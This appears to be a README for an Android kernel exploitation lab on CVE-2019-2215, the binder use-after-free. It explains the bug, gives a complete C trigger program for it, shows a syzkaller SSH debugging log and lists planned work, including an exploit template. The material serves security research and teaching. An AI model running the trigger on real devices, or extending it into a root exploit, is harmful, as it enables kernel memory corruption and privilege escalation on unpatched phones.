0xbinder/android-kernel-exploitation-lab

Android Kernel Exploitation Lab

This lab guides you through setting up an environment to explore CVE-2019-2215, a critical Android kernel vulnerability in the binder subsystem.

Documentation

Technical Details: CVE-2019-2215

This vulnerability is a use-after-free in the Android binder driver with the following characteristics:

  1. Root Cause: binder_poll() registers the wait queue embedded in the calling thread's binder_thread with epoll. The BINDER_THREAD_EXIT ioctl later frees that binder_thread without notifying epoll (the unpatched driver never signals POLLFREE), so epoll keeps a dangling pointer to the freed object's wait queue.

  2. Exploitation Path:

    • Add a binder file descriptor to an epoll instance (this runs binder_poll(), which links binder_thread->wait into the epoll entry)
    • Call the BINDER_THREAD_EXIT ioctl from the same thread, which frees the binder_thread
    • Remove the fd from the epoll instance (EPOLL_CTL_DEL) or close the epoll fd: ep_remove_wait_queue() unlinks the wait queue entry through the freed binder_thread
    • The resulting write into freed slab memory is a use-after-free exploitable for privilege escalation, for example by reclaiming the freed slot with a controlled object that the unlink then corrupts
  3. Impact: Affects Android devices whose kernels lack the upstream binder fix (Android 8.x, 9 and early 10 builds; patched in the October 2019 Android Security Bulletin), potentially allowing local privilege escalation to root.

  4. Further Reading:
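The trigger sequence from item 2 above, as an added example (this is not the lab's own code and not the exploit template the repository still plans to add): it opens the binder device, adds it to epoll, frees this thread's binder_thread with BINDER_THREAD_EXIT, and removes the fd so epoll unlinks through the freed object. The function names, the status enum and the default device path are this example's own choices; BINDER_THREAD_EXIT is the uapi ioctl number. Run it only inside the lab VM. It contains no heap spray or privilege-escalation logic, and on a patched kernel the three steps complete harmlessly.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/*
 * BINDER_THREAD_EXIT as defined in the kernel's uapi/linux/android/binder.h:
 * _IOW('b', 8, __s32). Spelled with _IOW so it follows the build host's ioctl
 * encoding; on x86_64 and arm64 it evaluates to 0x40046208.
 */
#define BINDER_THREAD_EXIT _IOW('b', 8, int32_t)

unsigned long binder_thread_exit_cmd(void)
{
    return (unsigned long)BINDER_THREAD_EXIT;
}

/* Status values are this example's own (hypothetical) convention. */
enum trigger_status {
    TRIGGER_REACHED_UAF = 0, /* all three steps ran; only a KASAN kernel reports it */
    TRIGGER_NO_BINDER   = 1, /* open() failed: no binder device at that path */
    TRIGGER_EPOLL_ERR   = 2,
    TRIGGER_IOCTL_ERR   = 3,
};

/*
 * Runs the CVE-2019-2215 trigger sequence against the binder device at
 * binder_path (normally "/dev/binder"). Every step must happen on the same
 * thread: binder_thread objects are per (process, tid), so binder_poll() and
 * BINDER_THREAD_EXIT have to refer to the same object.
 */
enum trigger_status trigger_cve_2019_2215(const char *binder_path)
{
    int fd = open(binder_path, O_RDWR);
    if (fd < 0)
        return TRIGGER_NO_BINDER;

    int epfd = epoll_create(1);
    if (epfd < 0) {
        close(fd);
        return TRIGGER_EPOLL_ERR;
    }

    struct epoll_event ev;
    memset(&ev, 0, sizeof(ev));
    ev.events = EPOLLIN;

    /* Step 1: EPOLL_CTL_ADD calls binder_poll(), which allocates this thread's
     * binder_thread if needed and links its embedded wait queue head,
     * thread->wait, into epoll's wait-queue entry for this fd. */
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev) < 0) {
        close(epfd);
        close(fd);
        return TRIGGER_EPOLL_ERR;
    }

    /* Step 2: BINDER_THREAD_EXIT frees the binder_thread. An unpatched driver
     * does not wake epoll with POLLFREE, so epoll's entry now points at freed
     * slab memory. The ioctl ignores its argument. */
    if (ioctl(fd, BINDER_THREAD_EXIT, NULL) < 0) {
        close(epfd);
        close(fd);
        return TRIGGER_IOCTL_ERR;
    }

    /* Step 3: EPOLL_CTL_DEL -> ep_remove_wait_queue() -> remove_wait_queue()
     * unlinks the entry through the dangling thread->wait pointer: this is the
     * use-after-free write. Closing epfd would take the same path. */
    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &ev);

    close(epfd);
    close(fd);
    return TRIGGER_REACHED_UAF;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/dev/binder";
    enum trigger_status st = trigger_cve_2019_2215(path);

    if (st == TRIGGER_REACHED_UAF)
        printf("trigger sequence completed; check the guest kernel log for a KASAN use-after-free report\n");
    else if (st == TRIGGER_NO_BINDER)
        printf("cannot open %s: %s (not a binder-enabled kernel?)\n", path, strerror(errno));
    else
        printf("trigger failed with status %d\n", (int)st);
    return st == TRIGGER_REACHED_UAF ? 0 : 1;
}
```

On a KASAN-instrumented guest kernel the EPOLL_CTL_DEL step produces a use-after-free report in the kernel log, which is the crash the lab's fuzzing setup is meant to reproduce. Without KASAN the write lands silently in freed slab memory, so a clean exit does not show that the kernel is patched.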

TODO

This lab is a work in progress. Here are planned improvements:

Short-term Improvements

  • Fix Syzkaller configuration to properly target Android-specific syscalls
  • Fix this Syzkaller issue: the guest kernel boots (the clocksource lines are from the VM), syzkaller's ssh connects to the forwarded port 13199 on the host, but no SSH banner arrives from the guest within the 10 s ConnectTimeout. With QEMU user-mode networking the host side typically accepts the forwarded connection even when nothing in the guest answers, so this usually means sshd is not running in the guest yet or the guest kernel has no driver for the QEMU NIC (see the kernel config item below).
[    3.030651] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2868278d270, max_idle_ns: 440795290098 ns
[    4.040338] clocksource: Switched to clocksource tsc
2025/03/24 21:04:23 running ssh: []string{"-p", "13199", "-F", "/dev/null", "-o", "UserKnownHostsFile=/dev/null", "-o", "IdentitiesOnly=yes", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no", "-o", "ConnectTimeout=10", "-i", "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa", "-v", "root@localhost", "pwd"}
2025/03/24 21:04:33 ssh failed: failed to run ["ssh" "-p" "13199" "-F" "/dev/null" "-o" "UserKnownHostsFile=/dev/null" "-o" "IdentitiesOnly=yes" "-o" "BatchMode=yes" "-o" "StrictHostKeyChecking=no" "-o" "ConnectTimeout=10" "-i" "/home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa" "-v" "root@localhost" "pwd"]: exit status 255
OpenSSH_9.9p2, OpenSSL 3.4.1 11 Feb 2025
debug1: Reading configuration data /dev/null
debug1: Connecting to localhost [::1] port 13199.
debug1: connect to address ::1 port 13199: Connection refused
debug1: Connecting to localhost [127.0.0.1] port 13199.
debug1: fd 3 clearing O_NONBLOCK
debug1: Connection established.
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa type 0
debug1: identity file /home/0xbinder/android-kernel-exploitation-lab/bullseye.id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.9
Connection timed out during banner exchange
Connection to 127.0.0.1 port 13199 timed out
  • Add detailed instructions for analyzing crash reports
  • Include a simple exploit template for CVE-2019-2215
  • Document proper kernel config settings for QEMU VM boot compatibility (at minimum a driver matching the QEMU NIC such as CONFIG_E1000 or CONFIG_VIRTIO_NET, CONFIG_VIRTIO_PCI and CONFIG_VIRTIO_BLK for a virtio disk, the binder options CONFIG_ANDROID_BINDER_IPC and CONFIG_ANDROID_BINDER_DEVICES, and the KCOV/KASAN options syzkaller requires)

Future Enhancements

  • Add support for other Android kernel vulnerabilities
  • Create a Docker container for easier setup
  • Add more comprehensive debugging guides with GDB examples
  • Implement a step-by-step guide for developing a full privilege escalation exploit
  • Support for ARM64 architecture in addition to x86_64

Known Issues

The syzkaller SSH failure shown under Short-term Improvements above: ssh to the forwarded port 13199 establishes a TCP connection but times out during banner exchange.

Community Contributions

If you're interested in contributing to this project, please consider addressing any of the items above or submit your own ideas through a pull request.

Help

We are particularly looking for help with:

  1. Fixing the known issues
  2. Improving QEMU configuration for better compatibility with the Android kernel
  3. Creating a reliable fuzzing setup that works across different Linux distributions

If you have expertise in these areas, your contributions would be greatly appreciated!
